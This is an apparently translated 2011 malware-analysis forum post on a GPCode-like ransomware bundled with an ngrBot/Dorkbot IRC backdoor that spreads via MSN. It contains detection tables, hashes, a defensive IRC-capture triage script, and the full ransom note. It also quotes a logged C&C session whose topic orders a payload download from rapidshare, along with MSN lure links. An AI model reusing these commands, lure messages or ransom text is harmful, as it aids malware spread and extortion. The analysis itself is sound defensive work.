A newcomer in today's malware packs…
This one is reminiscent of GPCode, a ransomware: it encrypts the documents, and a message tells you to send money to obtain the key that unlocks them (nothing guarantees the key will be handed over in return).
The desktop wallpaper is changed:
In addition to documents, shortcuts are encrypted as well.
A file named HOW TO DECRYPT FILES.txt is created on the desktop and opened; it contains this text:
Attention!!!
All your personal files (photo, documents, texts, databases, certificates, video) have been encrypted by a very strong cypher RSA-1024. The original files were deleted. You can check – just look for files in all folders.
There is no possibility to decrypt these files without a special decrypt program! Nobody can help you – even don’t try to find another method or tell anybody. Also after n days all encrypted files will be completely deleted and you will have no chance to get it back.
We can help to solve this task for 125$ via ukash/psc pre-paid cards. And remember: any harmful or bad words to our side will be a reason for ingoring your message and nothing will be done.
For details you have to send your request on this e-mail (attach to message a full serial key shown below in this ‘how to..’ file on desktop): [email protected]
44505212A536CB6D189E23A4EA80A97E0735285AAA3A8A3D41443A6DCB60C8C65E8DC58FE9697291436D7097D092C2E2E13DECB51B314612A117F0D3B93F5068
99EB792633D7552B428A7F5568154E597650D5459D2802C6DB66C8B1D31E3476B7378E1C4BCD932B739C53C91C9D27F99637ECCF63AFCE8B227ABAE07DAA1F28
The malware has IRC backdoor features and spreads via MSN, which recalls the MSN worms (Les Virus MSN):
:[email protected] TOPIC #nn :.m.s|.m.e Breaking news, a tsunami and possibly earthquake is comming to thailand. Its expected to hit in less then 24 hours. If you do not belive this message, please. View our LIVE Images: http://rapidshare.com/files/454292304/picture935-2011.JPG-thailand.com?=
Using rapidshare is nothing new:
https://forum.malekal.com/http-rapidshare-com-files-452642308-image545-mileycy-jpg-www-facebook-com-t31855.html
https://forum.malekal.com/post238930.html?hilit=rapidshare#p238930
https://forum.malekal.com/post237285.html?hilit=rapidshare#p237285
https://forum.malekal.com/post237075.html?hilit=rapidshare#p237075
https://forum.malekal.com/post234409.html?hilit=rapidshare#p234409
etc.
The Run key it uses: Windows UDP Control Center
The password: letmein
This points to the ASC groups: https://forum.malekal.com/208-183-223-buzus-t27272.html#p215236
In the past, Kaspersky managed to break one of the keys and offered a removal tool that gave access to the documents back.
It remains to be seen whether that is still possible: if the infection is well done, given that breaking a 1024-bit key is nearly impossible, recovering the documents may prove difficult.
Detection of the dropper at the time of writing:
File name: knockout.exe
Submission date: 2011-03-25 12:57:00 (UTC)
Current status: finished
Result: 7/ 41 (17.1%)
Antivirus Version Last Update Result
AhnLab-V3 2011.03.25.01 2011.03.25 –
AntiVir 7.11.5.74 2011.03.25 –
Antiy-AVL 2.0.3.7 2011.03.25 –
Avast 4.8.1351.0 2011.03.25 Win32:Kryptik-AZZ
Avast5 5.0.677.0 2011.03.25 Win32:Kryptik-AZZ
AVG 10.0.0.1190 2011.03.25 –
BitDefender 7.2 2011.03.25 Dropped:Trojan.Generic.KD.167224
CAT-QuickHeal 11.00 2011.03.25 –
ClamAV 0.96.4.0 2011.03.25 –
Commtouch 5.2.11.5 2011.03.24 –
Comodo 8100 2011.03.25 Heur.Packed.Unknown
DrWeb 5.0.2.03300 2011.03.25 BackDoor.IRC.Sdbot.4246
eSafe 7.0.17.0 2011.03.24 –
eTrust-Vet 36.1.8235 2011.03.25 –
F-Prot 4.6.2.117 2011.03.24 –
F-Secure 9.0.16440.0 2011.03.23 –
Fortinet 4.2.254.0 2011.03.25 –
GData 21 2011.03.25 Win32:Kryptik-AZZ
Ikarus T3.1.1.97.0 2011.03.25 –
Jiangmin 13.0.900 2011.03.25 –
K7AntiVirus 9.94.4211 2011.03.25 –
McAfee 5.400.0.1158 2011.03.25 –
McAfee-GW-Edition 2010.1C 2011.03.25 –
Microsoft 1.6702 2011.03.25 –
NOD32 5984 2011.03.25 –
Norman 6.07.03 None.. –
nProtect 2011-02-10.01 2011.02.15 –
Panda 10.0.3.5 2011.03.25 –
PCTools 7.0.3.5 2011.03.25 –
Prevx 3.0 2011.03.25 –
Rising 23.50.04.06 2011.03.25 –
Sophos 4.64.0 2011.03.25 Mal/FakeAV-IU
SUPERAntiSpyware 4.40.0.1006 2011.03.25 –
Symantec 20101.3.0.103 2011.03.25 –
TheHacker 6.7.0.1.156 2011.03.24 –
TrendMicro 9.200.0.1012 2011.03.25 –
TrendMicro-HouseCall 9.200.0.1012 2011.03.25 –
VBA32 3.12.14.3 2011.03.24 –
VIPRE 8814 2011.03.25 –
ViRobot 2011.3.25.4376 2011.03.25 –
VirusBuster 13.6.269.0 2011.03.25 –
Additional information
MD5 : c66f6f2f100300da50dad509d42cf4ef
SHA1 : 86881e75fd648856fc8c6f4767ae967489b73e12
SHA256: cb1f1f83751bfb095f03c90a013d8c24a79630dc5fac21afc396df72c5cdd080
Detection of the malware that does the encrypting:
File name: 1.exe
Submission date: 2011-03-25 14:14:17 (UTC)
Current status: finished
Result: 2/ 43 (4.7%)
Antivirus Version Last Update Result
AhnLab-V3 2011.03.25.01 2011.03.25 –
AntiVir 7.11.5.74 2011.03.25 –
Antiy-AVL 2.0.3.7 2011.03.25 –
Avast 4.8.1351.0 2011.03.25 –
Avast5 5.0.677.0 2011.03.25 –
AVG 10.0.0.1190 2011.03.25 –
BitDefender 7.2 2011.03.25 –
CAT-QuickHeal 11.00 2011.03.25 –
ClamAV 0.96.4.0 2011.03.25 –
Commtouch 5.2.11.5 2011.03.24 –
Comodo 8100 2011.03.25 –
DrWeb 5.0.2.03300 2011.03.25 –
Emsisoft 5.1.0.4 2011.03.25 –
eSafe 7.0.17.0 2011.03.24 –
eTrust-Vet 36.1.8235 2011.03.25 –
F-Prot 4.6.2.117 2011.03.25 –
F-Secure 9.0.16440.0 2011.03.23 –
Fortinet 4.2.254.0 2011.03.25 –
GData 21 2011.03.25 –
Ikarus T3.1.1.97.0 2011.03.25 –
Jiangmin 13.0.900 2011.03.25 –
K7AntiVirus 9.94.4211 2011.03.25 –
Kaspersky 7.0.0.125 2011.03.25 –
McAfee 5.400.0.1158 2011.03.25 –
McAfee-GW-Edition 2010.1C 2011.03.25 –
Microsoft 1.6702 2011.03.25 –
NOD32 5984 2011.03.25 –
Norman 6.07.03 2011.03.24 –
nProtect 2011-02-10.01 2011.02.15 –
Panda 10.0.3.5 2011.03.25 –
PCTools 7.0.3.5 2011.03.25 –
Prevx 3.0 2011.03.25 High Risk Cloaked Malware
Rising 23.50.04.06 2011.03.25 –
Sophos 4.64.0 2011.03.25 Mal/FakeAV-IU
SUPERAntiSpyware 4.40.0.1006 2011.03.25 –
Symantec 20101.3.0.103 2011.03.25 –
TheHacker 6.7.0.1.156 2011.03.24 –
TrendMicro 9.200.0.1012 2011.03.25 –
TrendMicro-HouseCall 9.200.0.1012 2011.03.25 –
VBA32 3.12.14.3 2011.03.25 –
VIPRE 8815 2011.03.25 –
ViRobot 2011.3.25.4376 2011.03.25 –
VirusBuster 13.6.269.0 2011.03.25 –
Additional information
MD5 : 72070d73697bf0654b0fd0945145dba4
SHA1 : 00b5ffca350d130925ebca21c680f600eeaf6b3d
SHA256: 832863ece8c7eced9395b8929b1557297feab33f8912210e8ff870ed849baab2
The IRC backdoor: http://www.virustotal.com/file-scan/report.html?id=501c5dd144a237d3b755c9940f3d2c33dceda118fcf90b81922fb55579418b32-1301060060
File name: 799972
Submission date: 2011-03-25 13:34:20 (UTC)
Current status: finished
Result: 6 /41 (14.6%)
Antivirus Version Last Update Result
AhnLab-V3 2011.03.25.01 2011.03.25 –
AntiVir 7.11.5.74 2011.03.25 –
Antiy-AVL 2.0.3.7 2011.03.25 –
Avast 4.8.1351.0 2011.03.25 Win32:Kryptik-AZZ
Avast5 5.0.677.0 2011.03.25 Win32:Kryptik-AZZ
AVG 10.0.0.1190 2011.03.25 –
BitDefender 7.2 2011.03.25 Trojan.Generic.KD.167224
CAT-QuickHeal 11.00 2011.03.25 –
ClamAV 0.96.4.0 2011.03.25 –
Commtouch 5.2.11.5 2011.03.24 –
Comodo 8100 2011.03.25 –
DrWeb 5.0.2.03300 2011.03.25 BackDoor.IRC.Sdbot.4246
eSafe 7.0.17.0 2011.03.24 –
eTrust-Vet 36.1.8235 2011.03.25 –
F-Prot 4.6.2.117 2011.03.24 –
Fortinet 4.2.254.0 2011.03.25 –
GData 21 2011.03.25 Trojan.Generic.KD.167224
Ikarus T3.1.1.97.0 2011.03.25 –
Jiangmin 13.0.900 2011.03.25 –
K7AntiVirus 9.94.4211 2011.03.25 –
Kaspersky 7.0.0.125 2011.03.25 –
McAfee 5.400.0.1158 2011.03.25 –
McAfee-GW-Edition 2010.1C 2011.03.25 –
Microsoft 1.6702 2011.03.25 –
NOD32 5984 2011.03.25 –
Norman 6.07.03 2011.03.24 –
nProtect 2011-02-10.01 2011.02.15 –
Panda 10.0.3.5 2011.03.25 –
PCTools 7.0.3.5 2011.03.25 –
Prevx 3.0 2011.03.25 –
Rising 23.50.04.06 2011.03.25 –
Sophos 4.64.0 2011.03.25 Mal/FakeAV-IU
SUPERAntiSpyware 4.40.0.1006 2011.03.25 –
Symantec 20101.3.0.103 2011.03.25 –
TheHacker 6.7.0.1.156 2011.03.24 –
TrendMicro 9.200.0.1012 2011.03.25 –
TrendMicro-HouseCall 9.200.0.1012 2011.03.25 –
VBA32 3.12.14.3 2011.03.24 –
VIPRE 8814 2011.03.25 –
ViRobot 2011.3.25.4376 2011.03.25 –
VirusBuster 13.6.269.0 2011.03.25 –
Additional information
MD5 : c52ab4d91b899e37397ec01e5a69d0cd
SHA1 : ec733d5d5f9ac25c3ec630009acd16dc5d5ab851
SHA256: 501c5dd144a237d3b755c9940f3d2c33dceda118fcf90b81922fb55579418b32
EDIT:
The IRC backdoor is ngrBot:
PASS ngrBot:Apache2.0 NOTICE AUTH :MOTD
NICK n{FR|XPa}dvrgypt
USER dvrgypt 0 0 :dvrgypt
JOIN #ngr ngrBot
:Apache2.0 001 n{FR|XPa}dvrgypt
:Apache2.0 002 n{FR|XPa}dvrgypt
:Apache2.0 003 n{FR|XPa}dvrgypt
:Apache2.0 004 n{FR|XPa}dvrgypt
:Apache2.0 005 n{FR|XPa}dvrgypt
:Apache2.0 005 n{FR|XPa}dvrgypt
:Apache2.0 005 n{FR|XPa}dvrgypt
:Apache2.0 422 n{FR|XPa}dvrgypt :MOTD
:n{FR|XPa}dvrgypt MODE n{FR|XPa}dvrgypt :+iwG
:n{FR|XPa}[email protected] JOIN :#ngr
:Apache2.0 332 n{FR|XPa}dvrgypt #ngr :.up http://rapidshare.com/files/454361616/ngr_fud.exe f02b7f011d753250cec3286ad91f6724 .msn.int # .msn.set http://redir.ec/photoalbum2011
:Apache2.0 333 n{FR|XPa}dvrgypt #ngr xxx 1301073359
JOIN #ngr ngrBot
PRIVMSG #ngr :[MSN]: Updated MSN spread interval to “7”
PRIVMSG #ngr :[MSN]: Updated MSN spread message to “http://redir.ec/photoalbum2011”
:Apache2.0 404 n{FR|XPa}dvrgypt #ngr :You must have a registered nick (+r) to talk on this channel (#ngr)
:Apache2.0 404 n{FR|XPa}dvrgypt #ngr :You must have a registered nick (+r) to talk on this channel (#ngr)
PING :Apache2.0
PONG :Apache2.0
PING :Apache2.0
PONG :Apache2.0
PING :Apache2.0
PONG :Apache2.0
PING :Apache2.0
PONG :Apache2.0
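Both captures above (the MSN spread message pushed through a channel TOPIC, and the ngrBot session whose numeric 332 topic carries the .up / .msn.set commands) have the same shape: the bot authenticates, joins a keyed channel, and receives its orders in the channel topic. The script below is an added example, not code from the original post, showing how a responder can triage such a capture offline: it parses raw IRC lines, records the nick, server password, channels and topics, and pulls the URLs and dot-prefixed commands out of the topics. The sample capture is constructed after the post's log; server and host names and the URLs are placeholders, and the nick and command heuristics are assumptions drawn from this capture only.

```python
"""Heuristic triage of a captured IRC session for ngrBot/Dorkbot-style C&C traffic.

Added example (not from the original post). Sample lines are constructed after
the post's capture; hosts and URLs are placeholders.
"""
import re
from dataclasses import dataclass, field
from typing import Optional

# RFC 1459 message shape: [":" prefix SPACE] command [SPACE params] [" :" trailing]
IRC_LINE = re.compile(r"^(?::(?P<prefix>\S+)\s+)?(?P<command>\S+)(?:\s+(?P<rest>.*))?$")
URL_RE = re.compile(r"https?://[^\s\"'<>]+")
# Nick pattern seen in the capture, n{COUNTRY|OSx}random (assumption based on this log only)
BOT_NICK_RE = re.compile(r"^n\{[A-Z]{2}\|[^}]+\}\w+$")
# Dot-prefixed bot commands such as .up, .msn.set, .m.s (assumption based on this log only)
BOT_CMD_RE = re.compile(r"(?<![\w./])\.[a-z]+(?:\.[a-z]+)*")


@dataclass
class IrcMessage:
    prefix: Optional[str]
    command: str
    params: list
    trailing: Optional[str]


def parse_irc_line(line: str) -> Optional[IrcMessage]:
    """Split one raw IRC line into prefix, command, middle params and trailing param."""
    m = IRC_LINE.match(line.strip())
    if not m:
        return None
    rest = m.group("rest") or ""
    if rest.startswith(":"):                 # only a trailing parameter
        params, trailing = [], rest[1:]
    elif " :" in rest:                       # middle params, then trailing
        head, trailing = rest.split(" :", 1)
        params = head.split()
    else:                                    # middle params only
        params, trailing = rest.split(), None
    return IrcMessage(m.group("prefix"), m.group("command").upper(), params, trailing)


@dataclass
class Triage:
    nick: Optional[str] = None
    server_password: Optional[str] = None
    channels: dict = field(default_factory=dict)   # channel -> key given on JOIN (or None)
    topics: dict = field(default_factory=dict)     # channel -> list of topic strings seen
    urls: list = field(default_factory=list)
    bot_commands: list = field(default_factory=list)
    indicators: list = field(default_factory=list)


def triage_capture(lines) -> Triage:
    """Walk a capture and collect the facts a responder wants plus heuristic indicators."""
    t = Triage()
    for raw in lines:
        msg = parse_irc_line(raw)
        if msg is None:
            continue
        if msg.command == "PASS" and msg.params:
            t.server_password = msg.params[0]
        elif msg.command == "NICK" and msg.params:
            t.nick = msg.params[0]
        elif msg.command == "JOIN":
            chan = msg.params[0] if msg.params else msg.trailing
            key = msg.params[1] if len(msg.params) > 1 else None
            if chan:
                t.channels.setdefault(chan, key)   # keep the key from the client's own JOIN
        elif msg.command == "332" and len(msg.params) >= 2 and msg.trailing:
            t.topics.setdefault(msg.params[-1], []).append(msg.trailing)   # RPL_TOPIC
        elif msg.command == "TOPIC" and msg.params and msg.trailing:
            t.topics.setdefault(msg.params[0], []).append(msg.trailing)    # topic change
    for topic in (x for lst in t.topics.values() for x in lst):
        for u in URL_RE.findall(topic):
            if u not in t.urls:
                t.urls.append(u)
        for c in BOT_CMD_RE.findall(topic):
            if c not in t.bot_commands:
                t.bot_commands.append(c)
    if t.nick and BOT_NICK_RE.match(t.nick):
        t.indicators.append("nick follows the n{CC|OS}random pattern")
    if t.server_password and any(t.channels.values()):
        t.indicators.append("server password and channel key supplied")
    if t.bot_commands and t.urls:
        t.indicators.append("channel topic carries dot-commands with download URLs")
    return t


def is_bot_session(t: Triage) -> bool:
    """Two independent indicators are enough to escalate the capture for review."""
    return len(t.indicators) >= 2


# Constructed sample, modelled on the post's capture (placeholder hosts and URLs).
SAMPLE_CAPTURE = [
    "PASS ngrBot",
    "NICK n{FR|XPa}dvrgypt",
    "USER dvrgypt 0 0 :dvrgypt",
    "JOIN #ngr ngrBot",
    ":irc.example.invalid 001 n{FR|XPa}dvrgypt",
    ":irc.example.invalid 422 n{FR|XPa}dvrgypt :MOTD",
    ":n{FR|XPa}dvrgypt!dvrgypt@host.invalid JOIN :#ngr",
    ":irc.example.invalid 332 n{FR|XPa}dvrgypt #ngr :.up http://files.example.invalid/ngr_fud.exe "
    "f02b7f011d753250cec3286ad91f6724 .msn.int # .msn.set http://short.example.invalid/photoalbum2011",
    ":ops!ops@host.invalid TOPIC #nn :.m.s|.m.e Breaking news, a tsunami is coming. "
    "View our LIVE Images: http://files.example.invalid/picture935-2011.JPG",
    'PRIVMSG #ngr :[MSN]: Updated MSN spread interval to "7"',
    "PING :irc.example.invalid",
    "PONG :irc.example.invalid",
]

# Constructed benign session for comparison.
BENIGN_CAPTURE = [
    "NICK alice",
    "USER alice 0 * :Alice",
    "JOIN #python",
    ":irc.example.invalid 332 alice #python :Welcome! Read the FAQ at https://docs.example.invalid/faq",
]

if __name__ == "__main__":
    for name, cap in (("sample", SAMPLE_CAPTURE), ("benign", BENIGN_CAPTURE)):
        t = triage_capture(cap)
        print(name, "bot session:", is_bot_session(t), "|", t.indicators, "|", t.urls)
```

The URLs and the hash that follows .up are the pieces worth blocking and hunting for on other hosts; the nick and key heuristics are deliberately weak on their own, which is why the verdict requires two of them.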
Possible detection: Worm:Win32/Dorkbot.gen!A at Microsoft and IM-Worm.Win32.Ckbface at Kaspersky. Spread links seen:
- http://redir.ec/images739131?=
- http://urlcut.me/pictures7331?
- http://redir.ec/photoalbum2011
- http://urlcut.me/images2011
- http://ibe.am/pictures37571?=
- etc.
EDIT:
Kaspersky's post: http://www.securelist.com/en/blog/6165/Ransomware_GPCode_strikes_back